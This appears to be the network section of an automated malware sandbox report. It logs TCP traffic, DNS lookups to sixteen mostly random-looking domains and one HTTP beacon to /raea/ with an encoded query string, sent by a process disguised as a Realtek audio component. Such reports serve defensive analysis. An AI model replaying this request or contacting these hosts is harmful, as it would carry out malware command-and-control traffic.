                                                                                                  Dec 3, 2024 09:53:19.744338036 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744353056 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744368076 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744383097 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744396925 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744411945 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744414091 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.744426966 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744441986 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744456053 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744469881 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744488001 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.744508982 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744524956 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744539022 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744554043 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744584084 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744599104 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744709015 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.744716883 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744782925 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.744890928 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.086128950 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086249113 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086268902 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086283922 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086298943 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086402893 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086442947 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.086503029 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086523056 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086539030 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086554050 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086569071 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086606979 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086622000 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086636066 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086652040 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086653948 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.086743116 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086747885 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.086757898 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:20.086868048 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.086961985 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:20.569757938 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:21.586317062 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:21.920658112 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:21.920826912 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:21.926038980 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:21.926100016 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.260474920 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.260490894 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.260500908 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262465000 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262485027 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262579918 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262598991 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262614965 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262629986 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262641907 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262731075 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.262739897 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262784004 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262800932 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.262851000 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.263031006 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.597188950 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597213984 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597229958 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597352028 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597359896 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.597373009 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597389936 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597405910 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597434998 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597450972 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597467899 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597482920 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597500086 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597516060 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597524881 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.597691059 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597706079 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.597712040 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597729921 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597747087 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597763062 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597779036 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597795010 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.597882986 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.598061085 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.931904078 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932178974 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932200909 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932216883 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932234049 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932250023 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932266951 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932281971 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932297945 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932313919 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932317972 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.932329893 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932346106 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932360888 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932377100 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932394028 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932410002 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932420969 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932432890 CET804995943.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:22.932537079 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:22.932657957 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:23.428591967 CET4995980192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:24.444828987 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:24.778810024 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:24.779055119 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:24.782480955 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.116373062 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118073940 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118132114 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118175983 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118218899 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118261099 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118303061 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118335962 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118345022 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.118381977 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118392944 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.118427038 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118470907 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.118629932 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.118683100 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.452255011 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452277899 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452292919 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452307940 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452472925 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452491999 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452507019 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452522039 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452539921 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.452610016 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.452624083 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452645063 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452657938 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.452660084 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452675104 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452689886 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452704906 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452719927 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452734947 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452749014 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452764988 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452780008 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.452794075 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.453094959 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.786375999 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786480904 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786501884 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786518097 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786533117 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786638021 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786658049 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786674023 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786688089 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786703110 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786719084 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786734104 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786741018 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.786748886 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786765099 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786780119 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786906958 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786923885 CET804996043.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:25.786995888 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.787257910 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:25.788516998 CET4996080192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:26.122096062 CET804996043.156.176.253192.168.11.30

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 3, 2024 09:47:40.982434034 CET5268353192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:47:41.167088032 CET53526831.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:47:56.487162113 CET6287753192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:47:56.670363903 CET53628771.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:48:10.312246084 CET5148853192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:48:10.500196934 CET53514881.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:48:23.652800083 CET5027553192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:48:23.771298885 CET53502751.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:48:37.228157043 CET4980653192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:48:37.348391056 CET53498061.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:48:50.506390095 CET6329753192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:48:50.629652023 CET53632971.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:49:05.690542936 CET6324953192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:49:05.801682949 CET53632491.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:49:20.077873945 CET6109453192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:49:20.876916885 CET53610941.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.043096066 CET6216153192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:49:35.170819044 CET53621611.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.149224043 CET6308153192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:49:50.493249893 CET53630811.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:50:04.208611965 CET5872453192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:50:04.555558920 CET53587241.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.268048048 CET6489053192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:50:18.388039112 CET53648901.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:50:31.577769041 CET5169853192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:50:31.828341007 CET53516981.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:50:45.309447050 CET6296653192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:50:45.447388887 CET53629661.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:50:59.134207010 CET5401453192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:50:59.605273008 CET53540141.1.1.1192.168.11.30
                                                                                                  Dec 3, 2024 09:51:13.630603075 CET4997853192.168.11.301.1.1.1
                                                                                                  Dec 3, 2024 09:51:13.884845018 CET53499781.1.1.1192.168.11.30

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 3, 2024 09:47:40.982434034 CET192.168.11.301.1.1.10x5df9Standard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:47:56.487162113 CET192.168.11.301.1.1.10xbe17Standard query (0)www.techmiseajour.netA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:10.312246084 CET192.168.11.301.1.1.10x5bdcStandard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:23.652800083 CET192.168.11.301.1.1.10x59a3Standard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:37.228157043 CET192.168.11.301.1.1.10xf80eStandard query (0)www.iglpg.onlineA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:50.506390095 CET192.168.11.301.1.1.10xad81Standard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:05.690542936 CET192.168.11.301.1.1.10xb24bStandard query (0)www.gk88top.topA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:20.077873945 CET192.168.11.301.1.1.10x8fa6Standard query (0)www.superiorfencing.netA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:35.043096066 CET192.168.11.301.1.1.10xda97Standard query (0)www.kmmm759j.sbsA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:50.149224043 CET192.168.11.301.1.1.10x54bStandard query (0)www.hemph.onlineA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:04.208611965 CET192.168.11.301.1.1.10x21b9Standard query (0)www.bootleggersrt.onlineA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:18.268048048 CET192.168.11.301.1.1.10x16a4Standard query (0)www.rafconstrutora.onlineA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:31.577769041 CET192.168.11.301.1.1.10xa598Standard query (0)www.seeseye.websiteA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:45.309447050 CET192.168.11.301.1.1.10x77eeStandard query (0)www.samundri.onlineA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:59.134207010 CET192.168.11.301.1.1.10xbb4bStandard query (0)www.dymar.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:51:13.630603075 CET192.168.11.301.1.1.10x6d6aStandard query (0)www.bahaeng.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 3, 2024 09:47:41.167088032 CET1.1.1.1192.168.11.300x5df9No error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:47:56.670363903 CET1.1.1.1192.168.11.300xbe17No error (0)www.techmiseajour.nettechmiseajour.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:47:56.670363903 CET1.1.1.1192.168.11.300xbe17No error (0)techmiseajour.net84.32.84.32A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:10.500196934 CET1.1.1.1192.168.11.300x5bdcNo error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:10.500196934 CET1.1.1.1192.168.11.300x5bdcNo error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:23.771298885 CET1.1.1.1192.168.11.300x59a3No error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:37.348391056 CET1.1.1.1192.168.11.300xf80eNo error (0)www.iglpg.onlineiglpg.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:37.348391056 CET1.1.1.1192.168.11.300xf80eNo error (0)iglpg.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:37.348391056 CET1.1.1.1192.168.11.300xf80eNo error (0)iglpg.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:50.629652023 CET1.1.1.1192.168.11.300xad81No error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:50.629652023 CET1.1.1.1192.168.11.300xad81No error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:50.629652023 CET1.1.1.1192.168.11.300xad81No error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:48:50.629652023 CET1.1.1.1192.168.11.300xad81No error (0)1hong.pels5zqo.shop129.226.153.85A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:05.801682949 CET1.1.1.1192.168.11.300xb24bNo error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:05.801682949 CET1.1.1.1192.168.11.300xb24bNo error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:20.876916885 CET1.1.1.1192.168.11.300x8fa6No error (0)www.superiorfencing.netsuperiorfencing.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:20.876916885 CET1.1.1.1192.168.11.300x8fa6No error (0)superiorfencing.net103.230.159.86A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:35.170819044 CET1.1.1.1192.168.11.300xda97No error (0)www.kmmm759j.sbs1.kmmm759j.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:35.170819044 CET1.1.1.1192.168.11.300xda97No error (0)1.kmmm759j.sbs4hong-xxx3.cnfol.beautyCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:35.170819044 CET1.1.1.1192.168.11.300xda97No error (0)4hong-xxx3.cnfol.beauty4hong.cnfol.beautyCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:35.170819044 CET1.1.1.1192.168.11.300xda97No error (0)4hong.cnfol.beauty43.156.176.253A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:49:50.493249893 CET1.1.1.1192.168.11.300x54bNo error (0)www.hemph.online31.31.196.17A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:04.555558920 CET1.1.1.1192.168.11.300x21b9No error (0)www.bootleggersrt.online31.31.196.17A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:18.388039112 CET1.1.1.1192.168.11.300x16a4No error (0)www.rafconstrutora.online172.67.159.24A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:18.388039112 CET1.1.1.1192.168.11.300x16a4No error (0)www.rafconstrutora.online104.21.34.103A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:31.828341007 CET1.1.1.1192.168.11.300xa598No error (0)www.seeseye.website103.224.182.242A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:45.447388887 CET1.1.1.1192.168.11.300x77eeNo error (0)www.samundri.onlinesamundri.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:45.447388887 CET1.1.1.1192.168.11.300x77eeNo error (0)samundri.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:50:59.605273008 CET1.1.1.1192.168.11.300xbb4bNo error (0)www.dymar.shop185.68.16.160A (IP address)IN (0x0001)false
                                                                                                  Dec 3, 2024 09:51:13.884845018 CET1.1.1.1192.168.11.300x6d6aNo error (0)www.bahaeng.com185.134.245.113A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.christinascuties.net
                                                                                                  • www.techmiseajour.net
                                                                                                  • www.aktmarket.xyz
                                                                                                  • www.golivenow.live
                                                                                                  • www.iglpg.online
                                                                                                  • www.1qcczjvh2.autos
                                                                                                  • www.gk88top.top
                                                                                                  • www.superiorfencing.net
                                                                                                  • www.kmmm759j.sbs
                                                                                                  • www.hemph.online
                                                                                                  • www.bootleggersrt.online
                                                                                                  • www.rafconstrutora.online
                                                                                                  • www.seeseye.website
                                                                                                  • www.samundri.online
                                                                                                  • www.dymar.shop
                                                                                                  • www.bahaeng.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.11.304986374.208.236.156805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:47:41.304838896 CET421OUTGET /raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.christinascuties.net
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:47:41.440196037 CET770INHTTP/1.1 404 Not Found
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 626
                                                                                                  Connection: close
                                                                                                  Date: Tue, 03 Dec 2024 08:47:41 GMT
                                                                                                  Server: Apache
